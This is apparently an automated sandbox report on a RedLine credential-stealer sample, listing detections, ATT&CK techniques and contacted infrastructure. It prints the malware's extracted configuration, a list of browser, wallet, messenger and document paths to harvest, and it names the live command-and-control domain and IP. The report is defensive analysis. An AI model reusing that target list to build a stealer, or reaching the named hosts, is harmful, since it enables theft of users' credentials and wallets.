ID: 440389 Sample Name: 3jdkEgyWkk Cookbook: default.jbs Time: 09:34:02 Date: 25/06/2021 Version: 32.0.0 Black Diamond

Table of Contents

Table of Contents 2
Windows Analysis Report 3jdkEgyWkk 4
  Overview 4
    General Information 4
    Detection 4
    Signatures 4
    Classification 4
    Process Tree 4
    Malware Configuration 4
      Threatname: RedLine 4
    Yara Overview 5
      Initial Sample 5
      Memory Dumps 5
      Unpacked PEs 6
    Sigma Overview 6
    Signature Overview 6
      AV Detection: 6
      Networking: 6
      Data Obfuscation: 6
      Malware Analysis System Evasion: 6
      Stealing of Sensitive Information: 6
      Remote Access Functionality: 6
    Mitre Att&ck Matrix 6
    Behavior Graph 7
    Screenshots 7
      Thumbnails 7
    Antivirus, Machine Learning and Genetic Malware Detection 8
      Initial Sample 8
      Dropped Files 8
      Unpacked PE Files 8
      Domains 8
      URLs 9
    Domains and IPs 10
      Contacted Domains 10
      Contacted URLs 10
      URLs from Memory and Binaries 10
      Contacted IPs 10
        Public 10
    General Information 10
    Simulations 11
      Behavior and APIs 11
    Joe Sandbox View / Context 11
      IPs 11
      Domains 11
      ASN 11
      JA3 Fingerprints 12
      Dropped Files 12
    Created / dropped Files 12
    Static File Info 18
      General 18
      File Icon 18
      Static PE Info 18
        General 18
        Authenticode Signature 19
        Entrypoint Preview 19
        Data Directories 19
        Sections 19
        Resources 19
        Imports 19
        Version Infos 19
    Network Behavior 19
      Snort IDS Alerts 19
      Network Port Distribution 19
      TCP Packets 19
      UDP Packets 19
      DNS Queries 19
      DNS Answers 20
      HTTP Request Dependency Graph 20
      HTTP Packets 20
    Code Manipulations 22
    Statistics 22
    System Behavior 22
      Analysis Process: 3jdkEgyWkk.exe PID: 256 Parent PID: 5792 22
        General 22
        File Activities 22
          File Created 22
          File Deleted 22
          File Read 22
        Registry Activities 22
    Disassembly 22
      Code Analysis 23

Copyright Joe Security LLC 2021 Page 2 of 23

Windows Analysis Report 3jdkEgyWkk

Overview

General Information

Sample Name: 3jdkEgyWkk (renamed file extension from none to exe)
Analysis ID: 440389
MD5: ca1a62feb278165…
SHA1: 81464d4f737875e…
SHA256: f7b9325ac03957e…
Tags: 32 exe trojan
Infos:
Most interesting Screenshot:

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for subm…
Yara detected RedLine Stealer
.NET source code contains a method …
Found many strings related to Crypt…
Performs DNS queries to domains w…
Queries sensitive disk information (v…
Tries to harvest and steal browser in…
AV process strings found (often use…
Binary contains a suspicious time st…
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / Us…
HTTP GET or POST without a user …
Internet Provider seen in connection …
May sleep (evasive loops) to hinder …
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (nam…
Sample execution stops while proc…
Sample file is different than original …
Uses 32bit PE files
Yara detected Credential Stealer

Classification

(Classification wheel, figure.) Detected family: RedLine. Categories on the wheel: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware. Scale: malicious, suspicious, clean.

Process Tree

System is w10x64
3jdkEgyWkk.exe (PID: 256 cmdline: 'C:\Users\user\Desktop\3jdkEgyWkk.exe' MD5: CA1A62FEB27816580DB61309AB443A61)
cleanup

Malware Configuration

Threatname: RedLine

{
  "BlockedCountry": [],
  "BlockedIP": [],
  "ScanBrowsers": "true",
  "ScanChromeBrowsersPaths": [
    "%USERPROFILE%\\AppData\\Local\\Battle.net",
    "%USERPROFILE%\\AppData\\Local\\Chromium\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data",
    "%USERPROFILE%\\AppData\\Roaming\\ Software\\",
    "%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Iridium\\User Data",
    "%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data",
    "%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Chedot\\User Data",
    "%USERPROFILE%\\AppData\\Local\\\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Kometa\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\ Privacy Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer",
    "%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data",
    "%USERPROFILE%\\AppData\\Local\\liebao\\User Data",
    "%USERPROFILE%\\AppData\\Local\\QIP \\User Data",
    "%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data",
    "%USERPROFILE%\\AppData\\Local\\\\User Data",
    "%USERPROFILE%\\AppData\\Local\\\\YandexBrowser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Comodo\\User Data",
    "%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data",
    "%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data",
    "%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Uran\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data",
    "%USERPROFILE%\\AppData\\Local\\BraveSoftware\\-Browser\\User Data",
    "%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data",
    "%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience",
    "%USERPROFILE%\\AppData\\Local\\Steam",
    "%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data"
  ],
  "ScanDiscord": "true",
  "ScanFTP": "true",
  "ScanFiles": "true",
  "ScanFilesPaths": [
    "%userprofile%\\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0",
    "%userprofile%\\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0"
  ],
  "ScanGeckoBrowsersPaths": [
    "%USERPROFILE%\\AppData\\Roaming\\Mozilla\\",
    "%USERPROFILE%\\AppData\\Roaming\\",
    "%USERPROFILE%\\AppData\\Roaming\\K-Meleon",
    "%USERPROFILE%\\AppData\\Roaming\\Thunderbird",
    "%USERPROFILE%\\AppData\\Roaming\\Comodo\\IceDragon",
    "%USERPROFILE%\\AppData\\Roaming\\8pecxstudios\\Cyberfox",
    "%USERPROFILE%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw",
    "%USERPROFILE%\\AppData\\Roaming\\Moonchild Productions\\"
  ],
  "ScanScreen": "true",
  "ScanSteam": "true",
  "ScanTelegram": "true",
  "ScanVPN": "true",
  "ScanWallets": "true"
}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
3jdkEgyWkk.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
Process Memory Space: 3jdkEgyWkk.exe PID: 256 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
Process Memory Space: 3jdkEgyWkk.exe PID: 256 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.3jdkEgyWkk.exe.230000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0.0.3jdkEgyWkk.exe.230000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration

Multi AV Scanner detection for submitted file

Networking:

Performs DNS queries to domains with low reputation

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Malware Analysis System Evasion:

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Remote Access Functionality:

Yara detected RedLine Stealer

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation 1 1; Command and Scripting Interpreter 2; At (); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Disable or Modify Tools 1; Virtualization/Sandbox Evasion 1 2 1; Process Injection 1; Deobfuscate/Decode Files or Information 1; Software Packing 1; Timestomp 1
Credential Access: OS Credential Dumping 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery 1 1 1; Process Discovery 2; Virtualization/Sandbox Evasion 1 2 1; Application Window Discovery 1; Remote System Discovery 1; System Information Discovery 1 1 3
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data 1 1; Data from Local System 2; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel 1; Non-Application Layer Protocol 2; Application Layer Protocol 2; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service

Behavior Graph

(Behavior graph, figure; the labels below are recovered from the image.)

ID: 440389 Sample: 3jdkEgyWkk Startdate: 25/06/2021 Architecture: WINDOWS Score: 84

Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

Process node: 3jdkEgyWkk.exe (started; badges 15 and 22)
Signatures on the process node: Multi AV Scanner detection for submitted file; Yara detected RedLine Stealer; Found malware configuration; 3 other signatures; Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Performs DNS queries to domains with low reputation
Network nodes: sozigylkal.xyz; 212.80.219.75 (ports 49723, 49733, 80; SERVERIUS-ASNL, Lithuania); api.ip.sb; prda.aadg.msidentity.com; Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
3jdkEgyWkk.exe | 39% | Virustotal | | Browse
3jdkEgyWkk.exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
sozigylkal.xyz | 1% | Virustotal | | Browse
api.ip.sb | 0% | Virustotal | | Browse

URLs

Source | Detection | Scanner | Label | Link
service.r | 0% | URL Reputation | safe |
service.r | 0% | URL Reputation | safe |
service.r | 0% | URL Reputation | safe |
service.r | 0% | URL Reputation | safe |
ocsp.sectigo.com0 | 0% | URL Reputation | safe |
ocsp.sectigo.com0 | 0% | URL Reputation | safe |
ocsp.sectigo.com0 | 0% | URL Reputation | safe |
ocsp.sectigo.com0 | 0% | URL Reputation | safe |
tempuri.org/Endpoint/GetArguments | 0% | Virustotal | | Browse
tempuri.org/Endpoint/GetArguments | 0% | Avira URL Cloud | safe |
sozigylkal.xyzd | 0% | Avira URL Cloud | safe |
://d41.co | 0% | Avira URL Cloud | safe |
https://postlnk.com/afu.php?zoneid=2579647&var=2579647&rid=wfxzsvAkbQDjdtH2xjZy_Q%3D%3D | 0% | Avira URL Cloud | safe |
tempuri.org/ | 0% | Avira URL Cloud | safe |
tempuri.org/Endpoint/VerifyUpdateResponse | 0% | Avira URL Cloud | safe |
sozigylkal.xyz:80/ | 0% | Avira URL Cloud | safe |
www.remote88.com:808/feii/ | 0% | Avira URL Cloud | safe |
go.micros | 0% | URL Reputation | safe |
go.micros | 0% | URL Reputation | safe |
go.micros | 0% | URL Reputation | safe |
tempuri.org/Endpoint/GetUpdates | 0% | Avira URL Cloud | safe |
tempuri.org/Endpoint/VerifyScanRequest | 0% | Avira URL Cloud | safe |
www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe |
www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe |
www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe |
https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
https://sectigo.com/CPS0D | 0% | URL Reputation | safe |
tempuri.org/Endpoint/VerifyUpdate | 0% | Avira URL Cloud | safe |
tempuri.org/0 | 0% | Avira URL Cloud | safe |
support.a | 0% | URL Reputation | safe |
support.a | 0% | URL Reputation | safe |
support.a | 0% | URL Reputation | safe |
https://bludwan.com/afu.php?zoneid=2974233&var=2974233&rid=wfxzsvAkbQDjdtH2xjZy_Q%253D%253D | 0% | Avira URL Cloud | safe |
https://watchseriesmovie.online/movie/570670/the-invisible-man%22 | 0% | Avira URL Cloud | safe |
sozigylkal.xyz | 0% | Avira URL Cloud | safe |
tempuri.org/Endpoint/VerifyScanRe | 0% | Avira URL Cloud | safe |
schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe |
schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe |
schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe |
https://api.ip.sb4 | 0% | URL Reputation | safe |
https://api.ip.sb4 | 0% | URL Reputation | safe |
https://api.ip.sb4 | 0% | URL Reputation | safe |
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe |
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe |
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe |
https://helpx.ad | 0% | URL Reputation | safe |
https://helpx.ad | 0% | URL Reputation | safe |
https://helpx.ad | 0% | URL Reputation | safe |
tempuri.org/Endpoint/GetUpd | 0% | Avira URL Cloud | safe |
sozigylkal.xyz/ | 0% | Avira URL Cloud | safe |
https://get.adob | 0% | URL Reputation | safe |
https://get.adob | 0% | URL Reputation | safe |
https://get.adob | 0% | URL Reputation | safe |
tempuri.org/Endpoint/GetArgumentsResponse | 0% | Avira URL Cloud | safe |
crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
10.223.5.145:8080 | 0% | Avira URL Cloud | safe |
crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
https://icanhazip.com4https://wtfismyip.com/textBbot.whatismyipaddress.com/2http://checkip.dy | 0% | Avira URL Cloud | safe |
forms.rea | 0% | URL Reputation | safe |
forms.rea | 0% | URL Reputation | safe |
forms.rea | 0% | URL Reputation | safe |
tempuri.org/Endpoint/GetUpdatesResponse | 0% | Avira URL Cloud | safe |
https://thebestvpndeals.com/best-vpn/ | 0% | Avira URL Cloud | safe |
tempuri.org/Endpoint/VerifyScanRequestResponse | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
sozigylkal.xyz | 212.80.219.75 | true | true | 1%, Virustotal, Browse | unknown
api.ip.sb | unknown | unknown | false | 0%, Virustotal, Browse | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
sozigylkal.xyz/ | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Contacted IPs

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
212.80.219.75 | sozigylkal.xyz | Lithuania | | 50673 | SERVERIUS-ASNL | true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 440389
Start date: 25.06.2021
Start time: 09:34:02
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 43s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 3jdkEgyWkk (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.troj.spyw.evad.winEXE@1/20@4/1
EGA Information: Failed
HDC Information: Successful, ratio: 1.3% (good quality ratio 0.3%); Quality average: 16.9%; Quality standard deviation: 33.8%
HCA Information: Successful, ratio: 98%; Number of executed functions: 0; Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI

Simulations

Behavior and APIs

Time | Type | Description
09:35:25 | API Interceptor | 21x Sleep call for process: 3jdkEgyWkk.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
212.80.219.75 | setup_x86_x64_install.exe | Get hash | malicious | Browse | freeprivacytoolsforyou.xyz/downloads/toolspab2.exe

Domains

No context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
SERVERIUS-ASNL | G7uT84AieQ.exe | Get hash | malicious | Browse | 212.80.219.46
SERVERIUS-ASNL | JQBIAqK18w.exe | Get hash | malicious | Browse | 212.80.219.46
SERVERIUS-ASNL | IRmda9meX0.exe | Get hash | malicious | Browse | 212.80.219.46
SERVERIUS-ASNL | setup_x86_x64_install.exe | Get hash | malicious | Browse | 212.80.219.75
SERVERIUS-ASNL | BOYIKrgSO4.exe | Get hash | malicious | Browse | 212.80.219.46
SERVERIUS-ASNL | ELx2QYnF3X.exe | Get hash | malicious | Browse | 212.80.219.46
SERVERIUS-ASNL | setup_x86_x64_install.exe | Get hash | malicious | Browse | 212.80.219.75
SERVERIUS-ASNL | yjO7jXU4o8.exe | Get hash | malicious | Browse | 212.80.219.75
SERVERIUS-ASNL | m2jCdKcFHA.exe | Get hash | malicious | Browse | 212.80.219.75
SERVERIUS-ASNL | hWA5p04FsO.exe | Get hash | malicious | Browse | 212.80.219.75
SERVERIUS-ASNL | yevbZfdCqR.exe | Get hash | malicious | Browse | 212.80.219.75
SERVERIUS-ASNL | document_06.21.2021.doc | Get hash | malicious | Browse | 45.67.231.44
SERVERIUS-ASNL | document_06.21.2021.doc | Get hash | malicious | Browse | 45.67.231.44
SERVERIUS-ASNL | xE2aoCI2oZ.exe | Get hash | malicious | Browse | 188.119.113.198
SERVERIUS-ASNL | Trainer v 4.6.1.exe | Get hash | malicious | Browse | 188.119.112.128
SERVERIUS-ASNL | wJiS3S2vpO.exe | Get hash | malicious | Browse | 188.119.113.198
SERVERIUS-ASNL | 4AUzoTtfYq.exe | Get hash | malicious | Browse | 193.38.55.84
SERVERIUS-ASNL | apbhJhZzn9.exe | Get hash | malicious | Browse | 45.67.231.194
SERVERIUS-ASNL | E71969906E6F39A1D837DE69BC6CCD27B6820157912D5.exe | Get hash | malicious | Browse | 193.38.54.196
SERVERIUS-ASNL | SecuriteInfo.com.Variant.Bulz.498529.31996.exe | Get hash | malicious | Browse | 193.38.54.96

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\tmp2113.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp2114.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp5BAD.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp5BDD.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp5BDE.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp5BDF.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 40960 Entropy (8bit): 0.792852251086831 Encrypted: false SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw MD5: 81DB1710BB13DA3343FC0DF9F00BE49F SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C......

C:\Users\user\AppData\Local\Temp\tmp963A.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 20480 Entropy (8bit): 0.6970840431455908 Encrypted: false SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0 MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6 SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85 SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3 Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ...... C...... g... .8......

C:\Users\user\AppData\Local\Temp\tmp963B.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 20480 Entropy (8bit): 0.6970840431455908 Encrypted: false SSDEEP: 24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0 MD5: 00681D89EDDB6AD25E6F4BD2E66C61C6 SHA1: 14B2FBFB460816155190377BBC66AB5D2A15F7AB SHA-256: 8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85 SHA-512: 159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3 Malicious: false Preview: SQLite format 3...... @ ...... C...... g... .8......

C:\Users\user\AppData\Local\Temp\tmpB81.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpB92.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

